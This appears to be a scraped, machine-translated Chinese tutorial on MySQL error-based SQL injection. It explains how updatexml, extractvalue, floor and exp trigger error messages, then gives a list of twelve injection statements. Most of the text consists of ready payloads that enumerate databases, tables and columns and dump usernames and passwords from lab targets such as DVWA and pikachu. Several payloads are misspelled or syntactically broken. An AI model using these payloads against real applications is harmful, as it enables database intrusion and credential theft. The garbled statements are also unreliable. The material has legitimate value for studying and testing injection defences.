当前位置:网站首页>SQL injection error report injection function graphic explanation
SQL injection error report injection function graphic explanation
2022-07-07 21:13:00 【1024 questions】
Preface
Commonly used error reporting function
Usage details
updatexml() function
example
extractvalue() function
floor() function
exp() function
12 An error reporting injection function
summary
PrefaceThe premise of error injection is that when the statement has errors , The error message is output to the front end . The reason for the vulnerability is that developers use print_r (),mysql_error(),mysqli_connect_error() Function will mysql The error information is output to the front end , So you can close the original statement , Execute the following statement .
Commonly used error reporting functionUsage details updatexml() functionupdatexml() yes mysql Yes xml Document data for query and modification xpath function
extractvalue() yes mysql Yes xml Document data for query xpath function
floor() mysql The function used to round in
exp() This function returns e( The base of natural logarithm ) Index X The power of
updatexml() The function is to change ( Find and replace )xml The value of the eligible node in the document
grammar :updatexml(xml_document,XPthstring,new_value)
The first parameter is the string string(XML The name of the document object )
The second parameter is to specify a location in the string (Xpath Format string )
The third parameter is what to replace with ,string Format
Xpath Positioning must be effective , Otherwise, there will be mistakes . We can use this feature to break out the data we want
exampleRegistration is to add data to the database ,insert.
Type single quotes... At the user Report errors
Guess the back-end statement
insert into user(name,password,sex,phone,address1,address2) value('xxx',123,1,2,3,4)Can be in xxx Close single quotation marks at , Reveal the data we want
?id=1' or updatexml(0,concat(0x7e,select database()),1)'Closing single quotation marks makes the statement escape , Then reconstruct the statement query , The name of blasting warehouse is :"pikachu"
The analysis process
When the input payload
?id=1' or updatexml(0,concat(0x7e,select database()),1)or'The back end will be spliced into
insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),0) or '',The table name and column name fields are the same as normal queries, but they have changed their positions
Use process
Library name
1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#Table name
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #Table lookup information ( Suppose there is a users surface , The library is dvwa
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #Check the field value ( Suppose the field name is last_name(dvwa.users It means to call dvwa Library users surface )
1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #extractvalue() function extractvalue() The function from the target xml Returns the string containing the value of the query
extractvalue (XML_document, XPath_string);
The first parameter :XML_document yes String Format , by XML The name of the document object , In this paper, for doc
The second parameter :XPath_string(Xpath Format string ),Xpath Positioning must be effective , Otherwise, there will be mistakes
structure payload
?id=1' or extracrvalue(0,concat(0x7e,database())) or '
Be careful xpath Echo has only one use limit Functions explode one by one , And the longest is 32 position , exceed 32 The position can't explode
Use process
Current library
1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #Current table
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #Table information ( Suppose the table is users
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #field value ( Field is user_id,first_name,last_name,(dvwa.users It means to call dvwa Library users surface )
1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #floor() function floor() yes mysql An integral function of
Library name
id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #Table name ( The library is dvwa, By modifying the limit 0,1 Value increment lookup table , limit 1,1、limit 2,1
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#Field name ( library :dvwa, surface :users
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#field value ( field value :user,password(dvwa.users It means to call dvwa library users surface
id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#exp() function When passing a greater than 709 The value of , function exp() It will cause an overflow error .
Library name
id=1' or exp(~(SELECT * from(select database())a)) or 'Table name ( Library name :pikachu
id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or 'Field name ( Table name :users
id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or 'field value ( Field name :password, Table name :users
id=1' or wzp(~(select * from(select password from users limit 0,1)a)) or '12 An error reporting injection function 1、 adopt floor Report errors , The injection statement is as follows :
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、 adopt extractvalue Report errors , The injection statement is as follows :
and (extractvalue(1,concat(0x7e,(select user()),0x7e)));3、 adopt updatexml Report errors , The injection statement is as follows :
and (updatexml(1,concat(0x7e,(select user()),0x7e),1));4、 adopt exp Report errors , The injection statement is as follows :
and exp(~(select * from (select user () ) a) );5、 adopt join Report errors , The injection statement is as follows :
select * from(select * from mysql.user ajoin mysql.user b)c;6、 adopt NAME_CONST Report errors , The injection statement is as follows :
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);7、 adopt GeometryCollection() Report errors , The injection statement is as follows :
and GeometryCollection(()select *from(select user () )a)b );8、 adopt polygon () Report errors , The injection statement is as follows :
and polygon (()select * from(select user ())a)b );9、 adopt multipoint () Report errors , The injection statement is as follows :
and multipoint (()select * from(select user() )a)b );10、 adopt multlinestring () Report errors , The injection statement is as follows :
and multlinestring (()select * from(selectuser () )a)b );11、 adopt multpolygon () Report errors , The injection statement is as follows :
and multpolygon (()select * from(selectuser () )a)b );12、 adopt linestring () Report errors , The injection statement is as follows :
and linestring (()select * from(select user() )a)b ); summary This is about SQL This is the end of the article on injecting the error reporting injection function , More about SQL Please search the previous articles of software development network or continue to browse the relevant articles below for the content of injection error reporting and injection function. I hope you will support software development network more in the future !
边栏推荐
- Écrivez une liste de sauts
- Can Huatai Securities achieve Commission in case of any accident? Is it safe to open an account
- Make this crmeb single merchant wechat mall system popular, so easy to use!
- Differences and connections between MinGW, mingw-w64, tdm-gcc and other tool chains "suggestions collection"
- 【函数递归】简单递归的5个经典例子,你都会吗?
- [uvalive 6663 count the regions] (DFS + discretization) [easy to understand]
- Codeforces round 296 (Div. 2) A. playing with paper[easy to understand]
- 如何满足医疗设备对安全性和保密性的双重需求?
- 阿里云有奖体验:如何通过ECS挂载NAS文件系统
- Do you have to make money in the account to open an account? Is the fund safe?
猜你喜欢
Optimization cases of complex factor calculation: deep imbalance, buying and selling pressure index, volatility calculation
C语言多角度帮助你深入理解指针(1. 字符指针2. 数组指针和 指针数组 、数组传参和指针传参3. 函数指针4. 函数指针数组5. 指向函数指针数组的指针6. 回调函数)
![Is embedded system really safe? [how does onespin comprehensively solve the IC integrity problem for the development team]](/img/af/61b384b1b6ba46aa1a6011f8a30085.png)
Is embedded system really safe? [how does onespin comprehensively solve the IC integrity problem for the development team]
Cantata9.0 | 全 新 功 能
Tensorflow2. How to run under x 1 Code of X
Onespin | solve the problems of hardware Trojan horse and security trust in IC Design
Make this crmeb single merchant wechat mall system popular, so easy to use!
ERROR: 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your
How to meet the dual needs of security and confidentiality of medical devices?
H3C s7000/s7500e/10500 series post stack BFD detection configuration method
随机推荐
sqlHelper的增删改查
写一下跳表
HOJ 2245 浮游三角胞(数学啊 )
Codeforces round 275 (Div. 2) C – diverse permutation (construction) [easy to understand]
Guava multithreading, futurecallback thread calls are uneven
C language helps you understand pointers from multiple perspectives (1. Character pointers 2. Array pointers and pointer arrays, array parameter passing and pointer parameter passing 3. Function point
Cocos2d-x game archive [easy to understand]
Helix QAC 2020.2 new static test tool maximizes the coverage of standard compliance
What are the official stock trading apps in the country? Is it safe to use
Small guide for rapid formation of manipulator (11): standard nomenclature of coordinate system
恶魔奶爸 B1 听力最后壁垒,一鼓作气突破
How to choose financial products? Novice doesn't know anything
Implement secondary index with Gaussian redis
2022年在启牛开中银股票的账户安全吗?
Cantata9.0 | 全 新 功 能
Is embedded system really safe? [how does onespin comprehensively solve the IC integrity problem for the development team]
解决使用uni-app MediaError MediaError ErrorCode -5
Small guide for rapid formation of manipulator (12): inverse kinematics analysis
Helix QAC 2020.2新版静态测试工具,最大限度扩展了标准合规性的覆盖范围
静态测试工具